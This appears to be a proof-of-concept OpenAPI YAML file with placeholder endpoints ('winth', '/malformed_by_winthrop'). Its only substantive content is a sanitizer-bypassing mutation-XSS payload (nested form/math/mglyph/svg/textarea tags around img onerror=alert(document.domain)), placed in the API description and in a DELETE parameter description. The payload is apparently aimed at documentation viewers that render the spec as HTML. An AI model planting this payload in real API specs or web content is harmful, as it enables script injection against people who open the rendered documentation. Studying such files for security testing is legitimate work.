---
openapi: '3.0.1'
info:
  title: Classic API Resource Documentation
  description: |
    <form><math><mtext></form><form><mglyph><svg><mtext><textarea><path id="</textarea><img onerror=alert(document.domain) src>"></form>
  version: production
basePath: https://winth.winth
produces:
- application/xml
- application/json
consumes:
- application/xml
- application/json
security:
- basicAuth: []
paths:
  "/winth":
    get:
      responses:
        '200':
          description: No response was specified
      tags:
      - somettext
      operationId: findAccounts
      summary: this is example text
  "/malformed_by_winthrop":
    delete:
      parameters:
      - description: |
          <form><math><mtext></form><form><mglyph><svg><mtext><textarea><path id="</textarea><img onerror=alert(document.domain) src>"></form>
        format: int64
        in: path
        name: id
        required: true
        type: integer
      responses:
        '200':
          description: No response was specified
      tags:
      - winthrop
      operationId: wint
      summary: winth
    get:
      parameters:
      - description: this is example text
        format: int64
        in: path
        name: id
        required: true
        type: integer
      responses:
        '200':
          description: No response was specified
      tags:
      - winth
      operationId: some_operation
      summary: this is example text
